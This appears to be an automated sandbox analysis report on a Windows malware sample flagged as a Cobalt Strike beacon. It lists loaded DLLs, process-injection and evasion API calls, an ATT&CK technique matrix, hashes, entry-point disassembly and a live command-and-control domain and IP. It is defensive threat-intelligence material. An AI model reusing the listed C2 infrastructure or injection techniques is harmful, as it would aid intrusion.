            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: msimg32.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: oleacc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: winmm.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: wininet.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: mswsock.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: iertutil.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: winhttp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: winnsi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: urlmon.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: srvcli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: netutils.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: schannel.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic file information: File size 3636736 > 1048576
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x211c00
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: More than 200 imports for USER32.dll
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: C:\Jenkins\workspace\consumer-12-0-1-service\bin\Release\x64\SBAMCommandLineScanner.pdb source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeStatic PE information: real checksum: 0x33725e should be: 0x3790fb
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401350C1 push rcx; ret 0_2_00000001401350C2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140104C7C SetForegroundWindow,IsIconic,PostMessageW,IsIconic,0_2_0000000140104C7C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140044F34 IsIconic,0_2_0000000140044F34
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013D3C0 IsIconic,GetWindowRect,IsIconic,GetSystemMetrics,OffsetRect,GetSystemMetrics,IsIconic,GetSystemMetrics,GetSystemMetrics,0_2_000000014013D3C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400B1740 GetParent,IsIconic,GetParent,GetDlgCtrlID,0_2_00000001400B1740
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140105A3C IsIconic,0_2_0000000140105A3C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140099CE8 SetRectEmpty,RedrawWindow,ReleaseCapture,SetCapture,ReleaseCapture,SetCapture,GetParent,SendMessageW,UpdateWindow,GetParent,SendMessageW,IsWindow,IsIconic,IsZoomed,IsWindow,UpdateWindow,0_2_0000000140099CE8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001400C5D9C IsWindowVisible,IsIconic,0_2_00000001400C5D9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013DFAC IsWindowVisible,IsWindowVisible,GetWindowRect,IsIconic,CopyRect,MonitorFromPoint,GetMonitorInfoW,CopyRect,CopyRect,SystemParametersInfoW,OffsetRect,GetSystemMetrics,GetSystemMetrics,0_2_000000014013DFAC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014013E2CC IsIconic,PostMessageW,0_2_000000014013E2CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401CDB40 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00000001401CDB40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeAPI coverage: 1.5 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014003C388 GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,0_2_000000014003C388
            Source: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2364213906.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000002.3314909007.0000000000459000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2304843739.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2275023579.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2395775873.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2121493380.00000000004DC000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2438416359.00000000004DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_3_01FC4060 LdrLoadDll,0_3_01FC4060
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401D83C4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00000001401D83C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401CC9B0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00000001401CC9B0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_000000014000E540 GetProcessHeap,_Init_thread_footer,_Init_thread_footer,0_2_000000014000E540
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtResumeThread: Indirect: 0x20A4F90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A3ACA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtAllocateVirtualMemory: Indirect: 0x1FC0185
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtCreateThreadEx: Indirect: 0x20A6602
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A6953
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtResumeThread: Indirect: 0x20A66ED
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSuspendThread: Indirect: 0x20A4E8C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A3D44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtSetContextThread: Indirect: 0x20A66D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtCreateThreadEx: Indirect: 0x20A686D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtAllocateVirtualMemory: Indirect: 0x1FC0249
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeNtProtectVirtualMemory: Indirect: 0x1FC0887
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeThread register set: 6516 40
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001402009C0 AllocateAndInitializeSid,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,MakeSelfRelativeSD,GetLastError,LocalAlloc,MakeSelfRelativeSD,LocalFree,LocalFree,FreeSid,0_2_00000001402009C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: try_get_function,GetLocaleInfoW,0_2_00000001401EFFE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_00000001401F0068 try_get_function,GetSystemTimeAsFileTime,0_2_00000001401F0068
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeCode function: 0_2_0000000140054158 GetVersionExW,wcschr,CoInitializeEx,CoCreateInstance,0_2_0000000140054158
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Remote Access Functionality

            Source: Yara matchFile source: 0.3.SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe.2050000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.3315857206.00000000020D5000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.2073190217.0000000002068000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe PID: 6516, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading
            1
            Process Injection
            1
            Disable or Modify Tools
            21
            Input Capture
            1
            System Time Discovery
            Remote Services21
            Input Capture
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism
            1
            Process Injection
            LSASS Memory1
            Query Registry
            Remote Desktop Protocol1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            Security Account Manager31
            Security Software Discovery
            SMB/Windows Admin Shares1
            Clipboard Data
            2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials14
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop


            Source | Detection | Scanner | Label | Link
            SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe | 25% | ReversingLabs | Win64.Backdoor.CobaltStrikeBeacon |
            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            easthoolbook.com | 89.150.57.46 | true | true | | unknown

            Name | Malicious | Antivirus Detection | Reputation
            https://easthoolbook.com/sign.mpeg?dare=true | false | | unknown
            easthoolbook.com | true | | unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://easthoolbook.com/TjSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://easthoolbook.com/sign.mpeg?dare=trueProviderLjSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2901567104.000000000051B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2931428688.000000000051B000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://easthoolbook.com/sign.mpeg?dare=true$jSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2498019988.000000000051C000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://easthoolbook.com/bqSecuriteInfo.com.Win64.Malware-gen.14921.4629.exe, 00000000.00000003.2781427971.000000000313D000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
89.150.57.46 | easthoolbook.com | Italy | 39356 | AVANTI-UK-ASGB | true
                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                          Analysis ID:1428763
                                                                          Start date and time:2024-04-19 15:30:12 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 5s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:5
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          Detection:MAL
                                                                          Classification:mal92.troj.evad.winEXE@1/0@1/1
                                                                          EGA Information:
                                                                          • Successful, ratio: 100%
                                                                          HCA Information:
                                                                          • Successful, ratio: 73%
                                                                          • Number of executed functions: 9
                                                                          • Number of non-executed functions: 258
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • VT rate limit hit for: SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          No simulations
                                                                          No context
                                                                          No context
Match: AVANTI-UK-ASGB
Associated Sample Name / URL | Detection | Threat Name | Context
4cpLrmQNPM.elf | malicious | Mirai | 41.198.120.194
Quotation_Doc.wsf | malicious | Python Stealer | 89.150.57.121
BqGE57kqQq.elf | malicious | Mirai, Moobot | 41.198.120.153
mips.elf | malicious | Mirai, Moobot | 41.198.120.188
I5MXVvJym2.elf | malicious | Mirai | 88.210.159.170
MnR9Zf2F4a.elf | malicious | Mirai | 41.198.120.178
13TOimKEUH.elf | malicious | Mirai, Moobot | 41.198.120.176
0byIXCn6Uf.elf | malicious | Mirai, Moobot | 41.198.119.249
mips.elf | malicious | Mirai, Moobot | 41.198.120.163
arm.elf | malicious | Mirai, Moobot | 41.198.120.185
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
UMMAN #U0130HRACAT AFR5641 910-1714 1633.exe | malicious | GuLoader, Remcos | 89.150.57.46
SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exe | malicious | Unknown | 89.150.57.46
SecuriteInfo.com.Trojan.DownLoader40.42214.8350.4072.exe | malicious | Unknown | 89.150.57.46
POTWIERDZENIE_TRANSAKCJI_20240418145856.exe | malicious | GuLoader | 89.150.57.46
eInvoicing_pdf.vbs | malicious | FormBook | 89.150.57.46
SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe | malicious | PureLog Stealer | 89.150.57.46
SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exe | malicious | PureLog Stealer | 89.150.57.46
Shipping Dcuments_CI PKL_HL_.vbs | malicious | AgentTesla, GuLoader | 89.150.57.46
F723838674.vbs | malicious | Unknown | 89.150.57.46
Request for Proposal Quote_2414976#U00b7pdf.vbs | malicious | GuLoader, Lokibot | 89.150.57.46
                                                                          No context
                                                                          No created / dropped files found
                                                                          File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Entropy (8bit):6.412960095301957
                                                                          TrID:
                                                                          • Win64 Executable GUI (202006/5) 92.65%
                                                                          • Win64 Executable (generic) (12005/4) 5.51%
                                                                          • Generic Win/DOS Executable (2004/3) 0.92%
                                                                          • DOS Executable Generic (2002/1) 0.92%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:SecuriteInfo.com.Win64.Malware-gen.14921.4629.exe
                                                                          File size:3'636'736 bytes
                                                                          MD5:c720c50306558112b389ef44cff494f1
                                                                          SHA1:476f36c3f3a3aa0141b481fb683d3c0cbd767def
                                                                          SHA256:6b655ddf0b5cda5d24b62d2f387e0f83e57b7a931f55f49ad274b002c1a68b23
                                                                          SHA512:eac2ba4774dce3667226f246940818412acadb556ac714a41d3790564200c015622cac38364657f46a47bb7a0fc5f4a9a39786acfd43a502b8d051ee61b2cf74
                                                                          SSDEEP:49152:JkIpd4zV1qhdWfcYmw+FFndWaIO18B+VhlRVmgi5HKEOaDNkNVLORJ5kjAYW:yYVYlBWRVmgZyC0k0
                                                                          TLSH:D1F57DC9D6AC40E9D1A79234C902857BDEB1BC113A76F7DF30690E4A2F631A9CD59332
                                                                          File Content Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......9.B.}.,.}.,.}.,...(.a.,.../.n.,...)...,...(.[.,.../.q.,...)...,...*.p.,...-.\.,.}.-.g.,...)...,...)...,...%.t.,.....|.,.}...|.,
                                                                          Icon Hash:072c1d4933138e4d
                                                                          Entrypoint:0x1401cbf38
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x140000000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                          DLL Characteristics:HIGH_ENTROPY_VA
                                                                          Time Stamp:0x65C323A8 [Wed Feb 7 06:31:04 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:3b504801f5d6b0cd4eeeea42835639ab
                                                                          Instruction
                                                                          dec eax
                                                                          sub esp, 28h
                                                                          call 00007F73DC9D055Ch
                                                                          dec eax
                                                                          add esp, 28h
                                                                          jmp 00007F73DC9CFAFBh
                                                                          int3
                                                                          int3
                                                                          inc eax
                                                                          push ebx
                                                                          dec eax
                                                                          sub esp, 20h
                                                                          dec eax
                                                                          mov ebx, ecx
                                                                          xor ecx, ecx
                                                                          call dword ptr [00047593h]
                                                                          dec eax
                                                                          mov ecx, ebx
                                                                          call dword ptr [00047582h]
                                                                          call dword ptr [000478A4h]
                                                                          dec eax
                                                                          mov ecx, eax
                                                                          mov edx, C0000409h
                                                                          dec eax
                                                                          add esp, 20h
                                                                          pop ebx
                                                                          dec eax
                                                                          jmp dword ptr [00047578h]
                                                                          dec eax
                                                                          mov dword ptr [esp+08h], ecx
                                                                          dec eax
                                                                          sub esp, 38h
                                                                          mov ecx, 00000017h
                                                                          call 00007F73DCA05389h
                                                                          test eax, eax
                                                                          je 00007F73DC9CFC89h
                                                                          mov ecx, 00000002h
                                                                          int 29h
                                                                          dec eax
                                                                          lea ecx, dword ptr [0011E6ABh]
                                                                          call 00007F73DC9CFE4Fh
                                                                          dec eax
                                                                          mov eax, dword ptr [esp+38h]
                                                                          dec eax
                                                                          mov dword ptr [0011E792h], eax
                                                                          dec eax
                                                                          lea eax, dword ptr [esp+38h]
                                                                          dec eax
                                                                          add eax, 08h
                                                                          dec eax
                                                                          mov dword ptr [0011E722h], eax
                                                                          dec eax
                                                                          mov eax, dword ptr [0011E77Bh]
                                                                          dec eax
                                                                          mov dword ptr [0011E5ECh], eax
                                                                          dec eax
                                                                          mov eax, dword ptr [esp+40h]
                                                                          dec eax
                                                                          mov dword ptr [0011E6F0h], eax
                                                                          mov dword ptr [0011E5C6h], C0000409h
                                                                          mov dword ptr [0011E5C0h], 00000001h
                                                                          mov dword ptr [0011E5CAh], 00000001h
                                                                          mov eax, 00000008h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2d1080 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x306000 | 0x70698 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x2ed000 | 0x185e8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x377000 | 0xf7b8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x28bdb0 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x28bf18 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x28be20 | 0xf8 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x213000 | 0x1328 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
